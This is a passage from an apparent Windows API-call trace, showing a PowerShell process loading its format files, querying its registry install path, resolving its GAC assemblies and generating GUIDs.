[6]=0xc8, [7]=0x5f))) returned 0x0 [0109.107] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x839f4bad, Data2=0x44b4, Data3=0x4887, Data4=([0]=0xb1, [1]=0x23, [2]=0x39, [3]=0x96, [4]=0x5c, [5]=0x70, [6]=0xfc, [7]=0x14))) returned 0x0 [0109.108] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x25504d58, Data2=0x44a5, Data3=0x4bea, Data4=([0]=0x9c, [1]=0x23, [2]=0x6b, [3]=0xe4, [4]=0xf7, [5]=0xa7, [6]=0x99, [7]=0xd9))) returned 0x0 [0109.108] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xa0ff9df8, Data2=0xb96c, Data3=0x4845, Data4=([0]=0xa8, [1]=0xf3, [2]=0xf8, [3]=0x8a, [4]=0xbb, [5]=0x96, [6]=0x73, [7]=0x48))) returned 0x0 [0109.109] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x9b749990, Data2=0xe32f, Data3=0x4301, Data4=([0]=0xba, [1]=0x91, [2]=0xfc, [3]=0x9f, [4]=0x72, [5]=0xe4, [6]=0xb2, [7]=0x63))) returned 0x0 [0109.109] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xb2df7e93, Data2=0x35db, Data3=0x421e, Data4=([0]=0x86, [1]=0x83, [2]=0x20, [3]=0xd0, [4]=0x16, [5]=0x47, [6]=0x57, [7]=0x24))) returned 0x0 [0109.109] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xa59c5291, Data2=0x7594, Data3=0x4119, Data4=([0]=0x93, [1]=0x2f, [2]=0xcd, [3]=0xba, [4]=0x31, [5]=0x31, [6]=0x1b, [7]=0xc7))) returned 0x0 [0109.110] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x3f505ca4, Data2=0xd6e0, Data3=0x4cae, Data4=([0]=0xba, [1]=0xa0, [2]=0xf1, [3]=0xd5, [4]=0x5b, [5]=0x20, [6]=0x61, [7]=0x70))) returned 0x0 [0109.110] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xcac0cf8e, Data2=0x7b8c, Data3=0x499f, Data4=([0]=0xa6, [1]=0x35, [2]=0x2e, [3]=0x9e, [4]=0xad, [5]=0x1f, [6]=0x2d, [7]=0x9b))) returned 0x0 [0109.110] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x75e3b0f1, Data2=0x89ba, Data3=0x45f6, Data4=([0]=0xba, [1]=0xc5, [2]=0x5b, [3]=0x2f, [4]=0xde, [5]=0xbb, [6]=0x30, [7]=0x4b))) returned 0x0 [0109.111] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x2a2c54ed, Data2=0xc3ba, Data3=0x49a4, Data4=([0]=0xaf, [1]=0x7b, [2]=0xb1, [3]=0xb4, [4]=0x5d, [5]=0x57, [6]=0x1e, [7]=0x5c))) returned 0x0 [0109.111] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x45d5be35, Data2=0x49ab, Data3=0x4bd6, Data4=([0]=0xbc, [1]=0x7e, [2]=0xb1, [3]=0xe9, [4]=0x1c, [5]=0x21, [6]=0xd1, [7]=0x21))) returned 0x0 [0109.111] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.112] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xe5f0e3ca, Data2=0x7932, Data3=0x42c3, Data4=([0]=0xa9, [1]=0x16, [2]=0x95, [3]=0x94, [4]=0x90, [5]=0x7a, [6]=0xfc, [7]=0xeb))) returned 0x0 [0109.112] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.116] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.142] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xb90ae013, Data2=0xd6f4, Data3=0x4c21, Data4=([0]=0x9e, [1]=0xb4, [2]=0x61, [3]=0xf2, [4]=0x52, [5]=0x49, [6]=0x27, [7]=0x5b))) returned 0x0 [0109.142] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.143] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1f9a0005, Data2=0x2645, Data3=0x479c, Data4=([0]=0xa2, [1]=0x8, [2]=0x1, [3]=0xe8, [4]=0x37, [5]=0xa7, [6]=0xdc, [7]=0x3e))) returned 0x0 [0109.143] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xb457dbbc, Data2=0x15d9, Data3=0x4d7d, Data4=([0]=0xbb, [1]=0x24, [2]=0xf5, [3]=0x82, [4]=0x5a, [5]=0x9e, [6]=0x6a, [7]=0xb7))) returned 0x0 [0109.144] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf57a77dd, Data2=0xd835, Data3=0x4b2f, Data4=([0]=0xab, [1]=0xab, [2]=0xd5, [3]=0xf, [4]=0x9f, [5]=0x12, [6]=0xfd, [7]=0xd0))) returned 0x0 [0109.144] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x2b138e5, Data2=0xa96f, Data3=0x4380, Data4=([0]=0x80, [1]=0x77, [2]=0xfd, [3]=0x68, [4]=0x25, [5]=0x25, [6]=0x62, [7]=0x36))) returned 0x0 [0109.144] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xa0c52f7f, Data2=0x394c, Data3=0x4d39, Data4=([0]=0x84, [1]=0xff, [2]=0xf4, [3]=0x6d, [4]=0x27, [5]=0x5, [6]=0x74, [7]=0x51))) returned 0x0 [0109.145] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x677169f1, Data2=0x4695, Data3=0x45c8, Data4=([0]=0x9d, [1]=0xa9, [2]=0x2b, [3]=0x43, [4]=0xfb, [5]=0x97, [6]=0x45, [7]=0xcd))) returned 0x0 [0109.145] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf7019bab, Data2=0xa885, Data3=0x4637, Data4=([0]=0x9d, [1]=0x37, [2]=0xef, [3]=0x3d, [4]=0xaa, [5]=0xb, [6]=0x58, [7]=0x35))) returned 0x0 [0109.146] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.146] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x95a9ea56, Data2=0x5934, Data3=0x4ed5, Data4=([0]=0xb6, [1]=0x63, [2]=0x41, [3]=0x7b, [4]=0x7a, [5]=0xc5, [6]=0xf2, [7]=0xd9))) returned 0x0 [0109.147] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x1ec13a0f, Data2=0x72c0, Data3=0x422c, Data4=([0]=0xac, [1]=0x73, [2]=0xb9, [3]=0xfb, [4]=0x3a, [5]=0x29, [6]=0x28, [7]=0x93))) returned 0x0 [0109.147] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xd5d7092a, Data2=0xf8bb, Data3=0x4b04, Data4=([0]=0xbf, [1]=0x14, [2]=0xa3, [3]=0x3, [4]=0xc0, [5]=0xe6, [6]=0x6, [7]=0x1d))) returned 0x0 [0109.148] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xdf13046, Data2=0x80dc, Data3=0x46d2, Data4=([0]=0x82, [1]=0x5e, [2]=0xf9, [3]=0x83, [4]=0xfe, [5]=0x7, [6]=0x5a, [7]=0xac))) returned 0x0 [0109.148] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x3fa39dde, Data2=0x204d, Data3=0x4f9a, Data4=([0]=0xa0, [1]=0xbc, [2]=0x4, [3]=0xf2, [4]=0xe9, [5]=0x29, [6]=0xc2, [7]=0xb1))) returned 0x0 [0109.149] VirtualQuery (in: lpAddress=0x10bcc0, lpBuffer=0x10cb80, dwLength=0x30 | out: lpBuffer=0x10cb80*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.149] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xcf168e66, Data2=0x9d5, Data3=0x422b, Data4=([0]=0x8c, [1]=0x55, [2]=0x51, [3]=0x89, [4]=0x13, [5]=0x3a, [6]=0x3b, [7]=0xad))) returned 0x0 [0109.149] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xf2b84529, Data2=0x7519, Data3=0x467b, Data4=([0]=0xb0, [1]=0xa9, [2]=0xdd, [3]=0x95, [4]=0xdf, [5]=0x66, [6]=0x13, [7]=0x90))) returned 0x0 [0109.170] VirtualQuery (in: lpAddress=0x10bd30, lpBuffer=0x10cbf0, dwLength=0x30 | out: lpBuffer=0x10cbf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0109.170] VirtualQuery (in: lpAddress=0x10bd30, lpBuffer=0x10cbf0, dwLength=0x30 | out: lpBuffer=0x10cbf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0109.170] VirtualQuery (in: lpAddress=0x10bd30, lpBuffer=0x10cbf0, dwLength=0x30 | out: lpBuffer=0x10cbf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0109.170] VirtualQuery (in: lpAddress=0x10bd30, lpBuffer=0x10cbf0, dwLength=0x30 | out: lpBuffer=0x10cbf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0109.170] SetErrorMode (uMode=0x1) returned 0x1 [0109.171] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0109.171] SetErrorMode (uMode=0x1) returned 0x1 [0109.171] GetFileType (hFile=0x340) returned 0x1 [0109.171] ReadFile (in: hFile=0x340, lpBuffer=0x347e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347e100*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.177] ReadFile (in: hFile=0x340, lpBuffer=0x347e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347e100*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.231] ReadFile (in: hFile=0x340, lpBuffer=0x347e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347e100*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.231] ReadFile (in: hFile=0x340, lpBuffer=0x347e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347e100*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.232] ReadFile (in: hFile=0x340, lpBuffer=0x347e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347e100*, lpNumberOfBytesRead=0x10d058*=0x8b4, lpOverlapped=0x0) returned 1 [0109.232] ReadFile (in: hFile=0x340, lpBuffer=0x347d51c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347d51c*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0109.232] ReadFile (in: hFile=0x340, lpBuffer=0x347e100, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x347e100*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0109.232] SetErrorMode (uMode=0x1) returned 0x1 [0109.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0109.232] SetErrorMode (uMode=0x1) returned 0x1 [0109.232] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0109.232] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0109.232] CoTaskMemAlloc (cb=0x5a) returned 0x2a1c30 [0109.232] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1c30, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0109.233] CoTaskMemFree (pv=0x2a1c30) [0109.233] RegCloseKey (hKey=0x340) returned 0x0 [0109.233] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xbd2b8764, Data2=0xcdad, Data3=0x4b3b, Data4=([0]=0xb6, [1]=0xea, [2]=0x6a, [3]=0x6d, [4]=0x81, [5]=0xaf, [6]=0x0, [7]=0x7a))) returned 0x0 [0109.233] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x3e7d262b, Data2=0x7756, Data3=0x4a47, Data4=([0]=0xbd, [1]=0x60, [2]=0x33, [3]=0x6a, [4]=0xc1, [5]=0x53, [6]=0x66, [7]=0xb4))) returned 0x0 [0109.234] SetErrorMode (uMode=0x1) returned 0x1 [0109.234] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x340 [0109.234] SetErrorMode (uMode=0x1) returned 0x1 [0109.234] GetFileType (hFile=0x340) returned 0x1 [0109.234] ReadFile (in: hFile=0x340, lpBuffer=0x34bbee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bbee8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.237] ReadFile (in: hFile=0x340, lpBuffer=0x34bbee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bbee8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.240] ReadFile (in: hFile=0x340, lpBuffer=0x34bbee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bbee8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.240] ReadFile (in: hFile=0x340, lpBuffer=0x34bbee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bbee8*, lpNumberOfBytesRead=0x10d058*=0x1000, lpOverlapped=0x0) returned 1 [0109.240] ReadFile (in: hFile=0x340, lpBuffer=0x34bbee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bbee8*, lpNumberOfBytesRead=0x10d058*=0xe98, lpOverlapped=0x0) returned 1 [0109.240] ReadFile (in: hFile=0x340, lpBuffer=0x34bb4e8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bb4e8*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0109.240] ReadFile (in: hFile=0x340, lpBuffer=0x34bbee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10d058, lpOverlapped=0x0 | out: lpBuffer=0x34bbee8*, lpNumberOfBytesRead=0x10d058*=0x0, lpOverlapped=0x0) returned 1 [0109.241] SetErrorMode (uMode=0x1) returned 0x1 [0109.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d000 | out: lpFileInformation=0x10d000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0109.241] SetErrorMode (uMode=0x1) returned 0x1 [0109.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d0e8 | out: phkResult=0x10d0e8*=0x340) returned 0x0 [0109.241] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d06c, lpData=0x0, lpcbData=0x10d068*=0x0 | out: lpType=0x10d06c*=0x1, lpData=0x0, lpcbData=0x10d068*=0x56) returned 0x0 [0109.241] CoTaskMemAlloc (cb=0x5a) returned 0x2a1c30 [0109.241] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d03c, lpData=0x2a1c30, lpcbData=0x10d038*=0x56 | out: lpType=0x10d03c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d038*=0x56) returned 0x0 [0109.241] CoTaskMemFree (pv=0x2a1c30) [0109.241] RegCloseKey (hKey=0x340) returned 0x0 [0109.242] VirtualQuery (in: lpAddress=0x10bb80, lpBuffer=0x10ca40, dwLength=0x30 | out: lpBuffer=0x10ca40*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0109.242] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xcdeedc8f, Data2=0xa128, Data3=0x488c, Data4=([0]=0xbe, [1]=0xda, [2]=0x3c, [3]=0x6e, [4]=0xf4, [5]=0x3d, [6]=0x6e, [7]=0x7d))) returned 0x0 [0109.242] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x5c815fde, Data2=0xb149, Data3=0x453c, Data4=([0]=0xa7, [1]=0x2f, [2]=0xf8, [3]=0x6c, [4]=0xc, [5]=0x5b, [6]=0x89, [7]=0xde))) returned 0x0 [0109.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0109.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0109.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0109.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0109.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0109.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0109.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0109.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0109.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0109.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0109.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0109.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0109.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0109.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0110.178] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.178] CoTaskMemFree (pv=0x2af370) [0110.366] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.366] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.366] 